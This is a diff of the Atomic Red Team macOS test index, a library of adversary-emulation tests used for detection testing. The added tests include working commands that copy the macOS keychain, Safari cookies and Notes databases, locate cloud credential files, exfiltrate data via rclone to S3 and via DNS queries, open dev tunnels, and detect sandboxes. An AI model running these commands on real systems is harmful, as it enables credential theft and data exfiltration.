+          if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+            $env:AWS_PROFILE = "#{aws_profile}"
+          } else {
+            $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+            $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+          }
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
+          Write-Host "Done!"
+          Write-Host "Generating rclone config... " -NoNewLine
+          $config = @"
+          [exfils3]
+          type = s3
+          provider = AWS
+          env_auth = true
+          region = #{aws_region}
+          "@
+          $config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
+          Write-Host "Done!"
+          Write-Host "Exfiltrating data... " -NoNewLine
+          $bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
+          cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
+          $null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
+          Write-Host "Done!"
+        cleanup_command: |
+          Write-Host "Destroying AWS infrastructure... " -NoNewLine
+          $awsAccessKey = "#{aws_access_key}"
+          $awsSecretKey = "#{aws_secret_key}"
+          cd PathToAtomicsFolder/T1567.002/src/
+          if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+            $env:AWS_PROFILE = "#{aws_profile}"
+          } else {
+            $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+            $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+          }
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
+          Write-Host "Done!"
+        name: powershell
+        elevation_required: false
   T1030:
     technique:
       x_mitre_platforms:

atomics/Indexes/macos-index.yaml

@@ -2714,7 +2714,7 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.001
     atomic_tests:
-    - name: Detect Virtualization Environment (MacOS)
+    - name: Detect Virtualization Environment via ioreg
       auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
       description: 'ioreg contains registry entries for all the device drivers in
         the system. If it''s a virtual machine, one of the device manufacturer will
@@ -2730,6 +2730,49 @@ defense-evasion:
           ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
           detected''; fi;
 
+          '
+    - name: Detect Virtualization Environment using sysctl (hw.model)
+      auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
+      description: |
+        sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
+        but will return the hypervisor name (VMware7,0).
+        Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
+          ''Virtualization Environment detected''; fi;
+
+          '
+    - name: Check if System Integrity Protection is enabled
+      auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
+      description: "The latest versions of macOS have the System Integrity Protection
+        feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
+        purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
+        may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
+          ''Possible Virtualization Environment detected''; fi;
+
+          '
+    - name: Detect Virtualization Environment using system_profiler
+      auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
+      description: "system_profiler provides system hardware and software configuration
+        and the Model Identifier should provide the value similar to (sysctl -n hw.model).
+        \nWe should be able to find whether virtualization is enabled by checking
+        whether the Model Identifier does not contain \"Mac\".\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
+          | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
+          fi;
+
           '
   T1070.002:
     technique:
@@ -4511,7 +4554,7 @@ defense-evasion:
           text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
           key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
           key); subprocess.call(exec, shell=True)'''
-        cleanup_command: 
+        cleanup_command:
         name: bash
         elevation_required: false
   T1562:
@@ -20450,47 +20493,6 @@ privilege-escalation:
           sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
           sudo rm /Library/LaunchDaemons/#{plist_filename}
           sudo rm /tmp/T1543_004_atomicredteam.txt
-    - name: Launch Daemon - Users Directory
-      auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
-      description: 'Utilize LaunchDaemon in /Users directory  to touch temporary file
-        in /tmp
-
-        '
-      supported_platforms:
-      - macos
-      input_arguments:
-        plist_filename:
-          description: filename
-          type: string
-          default: com.atomicredteam.T1543.004.plist
-        path_malicious_plist:
-          description: Name of file to store in cron folder
-          type: string
-          default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
-      dependency_executor_name: bash
-      dependencies:
-      - description: 'The shared library must exist on disk at specified location
-          (#{path_malicious_plist})
-
-          '
-        prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
-          1; fi;
-
-          '
-        get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
-          try again."; exit 1;
-
-          '
-      executor:
-        name: bash
-        elevation_required: true
-        command: |
-          sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
-          sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
-        cleanup_command: |-
-          sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
       modified: '2024-09-12T15:25:57.059Z'
@@ -28724,7 +28726,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -28776,6 +28778,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -30231,6 +30234,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -30406,6 +30410,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -34087,47 +34092,6 @@ persistence:
           sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
           sudo rm /Library/LaunchDaemons/#{plist_filename}
           sudo rm /tmp/T1543_004_atomicredteam.txt
-    - name: Launch Daemon - Users Directory
-      auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
-      description: 'Utilize LaunchDaemon in /Users directory  to touch temporary file
-        in /tmp
-
-        '
-      supported_platforms:
-      - macos
-      input_arguments:
-        plist_filename:
-          description: filename
-          type: string
-          default: com.atomicredteam.T1543.004.plist
-        path_malicious_plist:
-          description: Name of file to store in cron folder
-          type: string
-          default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
-      dependency_executor_name: bash
-      dependencies:
-      - description: 'The shared library must exist on disk at specified location
-          (#{path_malicious_plist})
-
-          '
-        prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
-          1; fi;
-
-          '
-        get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
-          try again."; exit 1;
-
-          '
-      executor:
-        name: bash
-        elevation_required: true
-        command: |
-          sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
-          sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
-        cleanup_command: |-
-          sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm ~/Library/LaunchDaemons/#{plist_filename}
-          sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
       modified: '2024-09-12T15:25:57.059Z'
@@ -41926,7 +41890,125 @@ command-and-control:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
       identifier: T1572
-    atomic_tests: []
+    atomic_tests:
+    - name: Microsoft Dev tunnels (Linux/macOS)
+      auto_generated_guid: 9f94a112-1ce2-464d-a63b-83c1f465f801
+      description: |
+        Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
+
+        This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
+        Reference:
+        - [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
+        - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        port:
+          description: port number for tunnel
+          type: integer
+          default: 8080
+        download_url:
+          description: link to download devtunnel
+          type: string
+          default: https://aka.ms/TunnelsCliDownload/linux-x64
+        binary_path:
+          description: path to download devtunnel
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads/devtunnel
+      dependencies:
+      - description: 'Download devtunnel
+
+          '
+        prereq_command: 'test -f #{binary_path}
+
+          '
+        get_prereq_command: |
+          mkdir -p $(dirname #{binary_path})
+          curl -L "#{download_url}" -o "#{binary_path}"
+          chmod +x #{binary_path}
+      - description: 'Login to Microsoft Dev tunnels
+
+          '
+        prereq_command: '#{binary_path} user show | grep -q "Not logged in" && exit
+          1 || exit 0
+
+          '
+        get_prereq_command: 'echo "Login to devtunnel using the following command:
+          #{binary_path} user login"
+
+          '
+      executor:
+        command: "#{binary_path} host -p #{port} &\n"
+        cleanup_command: |
+          pkill -9 $(basename "#{binary_path}")
+          #{binary_path} user logout
+          rm #{binary_path}
+        name: bash
+    - name: VSCode tunnels (Linux/macOS)
+      auto_generated_guid: b877943f-0377-44f4-8477-f79db7f07c4d
+      description: |
+        Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
+        This atomic will generate a dev tunnel binding it to the local service running on the provided port.
+        Reference:
+        - [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
+        - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        artifact_base_url:
+          description: Base URL to download code-cli
+          type: string
+          default: https://code.visualstudio.com/sha/download
+        artifact_build:
+          description: build to download - Allowed values (stable/insiders)
+          type: string
+          default: stable
+        payload_path:
+          description: path to download code-cli
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads
+        additional_args:
+          description: additional arguments to pass to code tunnel
+          type: string
+          default: ''
+      dependencies:
+      - description: 'Install code-cli
+
+          '
+        prereq_command: 'which code
+
+          '
+        get_prereq_command: "ARCH_SUFFIX=$(uname -m | grep -q \"arm64\\|aarch64\"
+          && echo \"arm64\" || echo \"x64\")\nif [ \"$(uname)\" = \"Darwin\" ]\nthen
+          brew install code-cli\nelif [ \"$(expr substr $(uname) 1 5)\" = \"Linux\"
+          ]\nthen mkdir -p $(dirname #{payload_path})        \n  PKG_TYPE=$(command
+          -v apt >/dev/null && echo \"deb\" || echo \"rpm\")\n  curl -L \"#{artifact_base_url}?build=#{artifact_build}&os=linux-${PKG_TYPE}-${ARCH_SUFFIX}\"
+          -o \"#{payload_path}/code.${PKG_TYPE}\"\n  (which apt && apt install -y
+          \"#{payload_path}/code.${PKG_TYPE}\") || (which yum && yum install -y \"#{payload_path}/code.${PKG_TYPE}\")\n
+          \ rm \"#{payload_path}/code.${PKG_TYPE}\"\nfi\n"
+      - description: 'Login to VSCode Dev tunnels
+
+          '
+        prereq_command: 'code tunnel user show | grep -q "not logged in" && exit 1
+          || exit 0
+
+          '
+        get_prereq_command: 'echo "Login to code tunnel using the following command:
+          code tunnel user login"
+
+          '
+      executor:
+        command: 'nohup code tunnel --accept-server-license-terms #{additional_args}
+          >/dev/null 2>&1 &
+
+          '
+        cleanup_command: |
+          pkill -9 tunnel
+          code tunnel unregister
+          code tunnel user logout
+        name: sh
   T1071.003:
     technique:
       modified: '2024-04-16T12:28:59.928Z'
@@ -45543,7 +45625,31 @@ collection:
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1005
-    atomic_tests: []
+    atomic_tests:
+    - name: Copy Apple Notes database files using AppleScript
+      auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
+      description: 'This command will copy Apple Notes database files using AppleScript
+        as seen in Atomic Stealer.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        destination_path:
+          description: Specify the path to copy the database files into.
+          type: path
+          default: "/private/tmp"
+      executor:
+        command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
+          to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to
+          home folder as text) & "Library:Group Containers:group.com.apple.notes:"'
+          -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file
+          "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"}
+          of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile
+          to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
+        cleanup_command: rm "#{destination_path}/NoteStore.sqlite*"
+        name: sh
+        elevation_required: false
   T1560.002:
     technique:
       x_mitre_platforms:
@@ -49460,6 +49566,28 @@ credential-access:
         cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
         name: bash
         elevation_required: false
+    - name: Copy Safari BinaryCookies files using AppleScript
+      auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
+      description: 'This command will copy Safari BinaryCookies files using AppleScript
+        as seen in Atomic Stealer.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        destination_path:
+          description: Specify the path to copy the BinaryCookies file into.
+          type: path
+          default: "/private/tmp"
+      executor:
+        command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
+          to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
+          folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
+          -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
+          destinationFolderPath with replacing' -e 'end tell'
+        cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
+        name: sh
+        elevation_required: false
   T1003.002:
     technique:
       modified: '2024-10-15T16:40:52.174Z'
@@ -49827,6 +49955,26 @@ credential-access:
           '
         name: sh
         elevation_required: false
+    - name: Copy Keychain using cat utility
+      auto_generated_guid: 5c32102a-c508-49d3-978f-288f8a9f6617
+      description: 'This command will copy the keychain using the cat utility in a
+        manner similar to Atomic Stealer.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        keychain_export:
+          description: Specify the path to copy they keychain into.
+          type: path
+          default: "/tmp/keychain"
+      executor:
+        command: 'cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
+
+          '
+        cleanup_command: 'rm #{keychain_export}'
+        name: sh
+        elevation_required: false
   T1003.004:
     technique:
       modified: '2024-08-13T15:49:17.591Z'
@@ -52222,7 +52370,7 @@ credential-access:
       identifier: T1552.001
     atomic_tests:
     - name: Find AWS credentials
-      auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
+      auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
       description: 'Find local AWS credentials from file, defaults to using / as the
         look path.
 
@@ -52236,7 +52384,7 @@ credential-access:
           type: string
           default: "/"
       executor:
-        command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
+        command: 'find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
 
           '
         name: sh
@@ -52290,6 +52438,65 @@ credential-access:
           echo $file ; cat $file ; done
 
           '
+    - name: Find Azure credentials
+      auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
+      description: 'Find local Azure credentials from file, defaults to using / as
+        the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.azure -name "msal_token_cache.json" -o -name
+          "accessTokens.json" -type f 2>/dev/null
+
+          '
+        name: sh
+    - name: Find GCP credentials
+      auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
+      description: 'Find local Google Cloud Platform credentials from file, defaults
+        to using / as the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.config/gcloud -name "credentials.db" -o -name
+          "access_tokens.db" -type f 2>/dev/null
+
+          '
+        name: sh
+    - name: Find OCI credentials
+      auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
+      description: 'Find local Oracle cloud credentials from file, defaults to using
+        / as the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
+
+          '
+        name: sh
   T1606.001:
     technique:
       modified: '2023-09-19T21:25:10.511Z'
@@ -54811,7 +55018,7 @@ discovery:
       executor:
         name: bash
         elevation_required: false
-        command: 'ping -n 4 #{ping_target}
+        command: 'ping -c 4 #{ping_target}
 
           '
   T1069:
@@ -55403,7 +55610,7 @@ discovery:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.001
     atomic_tests:
-    - name: Detect Virtualization Environment (MacOS)
+    - name: Detect Virtualization Environment via ioreg
       auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
       description: 'ioreg contains registry entries for all the device drivers in
         the system. If it''s a virtual machine, one of the device manufacturer will
@@ -55419,6 +55626,49 @@ discovery:
           ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
           detected''; fi;
 
+          '
+    - name: Detect Virtualization Environment using sysctl (hw.model)
+      auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
+      description: |
+        sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
+        but will return the hypervisor name (VMware7,0).
+        Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
+          ''Virtualization Environment detected''; fi;
+
+          '
+    - name: Check if System Integrity Protection is enabled
+      auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
+      description: "The latest versions of macOS have the System Integrity Protection
+        feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
+        purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
+        may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
+          ''Possible Virtualization Environment detected''; fi;
+
+          '
+    - name: Detect Virtualization Environment using system_profiler
+      auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
+      description: "system_profiler provides system hardware and software configuration
+        and the Model Identifier should provide the value similar to (sysctl -n hw.model).
+        \nWe should be able to find whether virtualization is enabled by checking
+        whether the Model Identifier does not contain \"Mac\".\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
+          | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
+          fi;
+
           '
   T1069.002:
     technique:
@@ -58299,6 +58549,41 @@ discovery:
           nc -nv #{host} #{port}
         name: sh
         elevation_required: true
+    - name: Port Scan using nmap (Port range)
+      auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
+      description: 'Scan multiple ports to check for listening ports with nmap
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        host:
+          description: Host(s) to scan.
+          type: string
+          default: 127.0.0.1
+        port_range:
+          description: Port range(s) to scan.
+          type: string
+          default: 0-65535
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if nmap command exists on the machine
+
+          '
+        prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
+          fi;
+
+          '
+        get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
+          apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which
+          pkg && pkg install -y nmap)||(which brew && brew install nmap)\n"
+      executor:
+        command: 'nmap -Pn -sV -p #{port_range} #{host}
+
+          '
+        elevation_required: true
+        name: sh
   T1518:
     technique:
       modified: '2024-04-16T00:16:06.689Z'
@@ -63391,7 +63676,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -63409,7 +63694,41 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1595.003
+    atomic_tests:
+    - name: Web Server Wordlist Scan
+      auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
+      description: 'This test will scan a target system with a wordlist of common
+        directories and file paths.
+
+        '
+      supported_platforms:
+      - windows
+      - linux
+      - macos
+      input_arguments:
+        target:
+          description: The target system to scan
+          type: string
+          default: http://localhost
+        wordlist:
+          description: The wordlist to use for scanning
+          type: path
+          default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
+        request_timeout:
+          description: The timeout for each request (in seconds)
+          type: integer
+          default: 5
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:TMPDIR/wordlist_scan.txt"
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
+          Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
+          Write-Host "Scan complete. Results saved to: #{output_file}"
+        name: powershell
   T1591.004:
     technique:
       x_mitre_platforms:
@@ -68743,6 +69062,45 @@ exfiltration:
 
           '
         name: sh
+    - name: Exfiltrate Data using DNS Queries via dig
+      auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
+      description: "This test demonstrates how an attacker can exfiltrate sensitive
+        information by encoding it as a subdomain (using base64 encoding) and \nmaking
+        DNS queries via the dig command to a controlled DNS server.\n"
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        dns_port:
+          type: integer
+          default: '53'
+          description: Attacker's DNS server port
+        attacker_dns_server:
+          type: string
+          default: 8.8.8.8
+          description: Attacker's DNS server address
+        secret_info:
+          type: string
+          default: this is a secret info
+          description: secret info that will be exfiltirated
+      dependency_executor_name: bash
+      dependencies:
+      - description: dig command
+        prereq_command: which dig
+        get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
+          || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
+          install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
+          && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
+          update && brew install --quiet bind
+
+          '
+      executor:
+        command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
+          | base64).google.com
+
+          '
+        name: bash
+        elevation_required: false
   T1052.001:
     technique:
       x_mitre_platforms:
@@ -68885,7 +69243,133 @@ exfiltration:
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1567.002
-    atomic_tests: []
+    atomic_tests:
+    - name: Exfiltrate data with rclone to cloud Storage - AWS S3
+      auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
+      description: |
+        This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
+        See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        rclone_path:
+          description: Directory of rclone.exe
+          type: path
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
+        exfil_directory:
+          description: Directory to exfiltrate
+          type: string
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
+        terraform_path:
+          description: Directory of terraform
+          type: path
+          default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
+        aws_access_key:
+          description: AWS Access Key
+          type: string
+          default: ''
+        aws_secret_key:
+          description: AWS Secret Key
+          type: string
+          default: ''
+        aws_region:
+          description: AWS Region
+          type: string
+          default: us-east-1
+        aws_profile:
+          description: AWS Profile
+          type: string
+          default: default
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'rclone must exist at (#{rclone_path})
+
+          '
+        prereq_command: 'if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+          $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+          $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+          if ($operatingSystem -match "darwin") {
+            Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+          } elseif ($operatingSystem -match "linux") {
+            Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
+          }
+          Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
+      - description: terraform must exist at (#{terraform_path})
+        prereq_command: 'if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
+          $arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
+          $operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
+          if ($operatingSystem -match "darwin") {
+            Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+          } elseif ($operatingSystem -match "linux") {
+            Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
+          }
+          Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
+      - description: 'Must provide a valid directory or file path to exfiltrate to
+          AWS S3
+
+          '
+        prereq_command: 'if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
+          foreach($fileSuffix in 1..10) {
+            Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
+          }
+      executor:
+        command: |
+          Write-Host "Deploying AWS infrastructure... " -NoNewLine
+          $awsAccessKey = "#{aws_access_key}"
+          $awsSecretKey = "#{aws_secret_key}"
+          cd PathToAtomicsFolder/T1567.002/src/
+          if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+            $env:AWS_PROFILE = "#{aws_profile}"
+          } else {
+            $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+            $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+          }
